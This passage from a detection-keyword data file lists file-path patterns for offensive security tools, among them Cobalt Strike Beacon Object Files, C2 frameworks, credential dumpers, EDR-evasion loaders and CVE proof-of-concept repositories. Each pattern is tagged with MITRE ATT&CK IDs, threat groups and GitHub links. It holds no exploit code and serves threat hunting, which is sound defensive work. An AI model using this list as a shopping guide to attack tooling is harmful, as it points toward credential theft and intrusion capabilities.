- T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*//RRh0St/InJ3C*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*//shuck.sh*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*//StaticSyscallsDump/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/0d1n.c*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/0d1n_view*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/0tt7/CVE-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0004,N/A,N/A,Exploitation tools,https://github.com/0tt7/CVE-2022-23131,1,1,N/A,N/A,1,15,9,2022-02-21T08:25:56Z,2022-02-21T00:51:14Z -*/0xdarkvortex-*,offensive_tool_keyword,prometheus,malware C2,T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment,1,1,N/A,10,10,176,63,2020-07-21T06:14:44Z,2018-09-04T15:38:53Z -*/0xIronGoat/dirty-pipe*,offensive_tool_keyword,dirty-pipe,POC exploitation for dirty pipe vulnerability,T1068 - T1055 - T1003 - T1015,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xIronGoat/dirty-pipe,1,1,N/A,N/A,1,9,9,2022-03-08T15:47:53Z,2022-03-08T15:30:45Z -*/0xthirteen/*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*/0xthirteen/StayKit*,offensive_tool_keyword,StayKit,StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1059 - T1053 - T1124,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*/1mxml/CVE-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1190 - T1550 - T1078,TA0001 - TA0003,N/A,N/A,Exploitation tools,https://github.com/1mxml/CVE-2022-23131,1,1,N/A,N/A,1,3,1,2022-02-19T03:14:47Z,2022-02-18T14:48:53Z -*/365-Stealer.git*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,1,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*/3DESEncryptor.go*,offensive_tool_keyword,Augustus,Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.,T1055.012 - T1027.002 - T1136.001 - T1562.001,TA0005 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/TunnelGRE/Augustus,1,1,N/A,6,2,107,23,2023-08-27T10:37:51Z,2023-08-21T15:08:40Z -*/3snake.git*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,1,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*/4luc4rdr5290/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/4luc4rdr5290/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-08T20:41:15Z,2022-03-08T20:18:28Z -*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/AbandonedCOMKeys/*,offensive_tool_keyword,AbandonedCOMKeys,Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence,T1547.011 - T1049 - T1087.002,TA0005 - TA0007 - TA0003,N/A,N/A,Persistence,https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/acarsd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/AceLdr.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*/acheron.git*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*/acheron.go*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*/ACLight.git*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*/ACLight/*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,Information Gathering,https://github.com/cyberark/ACLight,1,1,N/A,N/A,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*/acltoolkit*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*/acm_enum_cas_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/acm_enum_certs_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/acm_enum_certs_chain_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/acm_enum_certs_expired_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/acm_enum_certs_info_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ActiveScanPlusPlus*,offensive_tool_keyword,ActiveScanPlusPlus,ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/albinowax/ActiveScanPlusPlus,1,1,N/A,N/A,6,568,192,2022-11-15T13:47:31Z,2014-06-23T10:04:13Z -*/AD_Enumeration_Hunt*,offensive_tool_keyword,AD_Enumeration_Hunt,This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment,T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083,TA0001 - TA0007 - TA0005 - TA0002 - TA0003,N/A,N/A,AD Enumeration,https://github.com/alperenugurlu/AD_Enumeration_Hunt,1,1,N/A,7,1,79,16,2023-08-05T06:10:26Z,2023-08-05T05:16:57Z -*/ADACLScanner.git*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,1,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*/adalanche/modules/*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*/adconnectdump.git*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*/adcs_enum/*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*/adcs_request/adcs_request.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/adcs_request/CertCli.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/adcs_request/certenroll.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/adcs_request/CertPol.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/adcs-enum.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/ADCSKiller*,offensive_tool_keyword,ADCSKiller,ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure,T1552.004 - T1003.003 - T1114.002,TA0006 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/grimlockx/ADCSKiller,1,1,N/A,N/A,6,535,53,2023-05-19T17:36:37Z,2023-05-19T06:51:41Z -*/ADCSPwn.git*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*/add_groupmember.py*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*/address-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/AddUser-Bof.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*/AddUser-Bof/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z 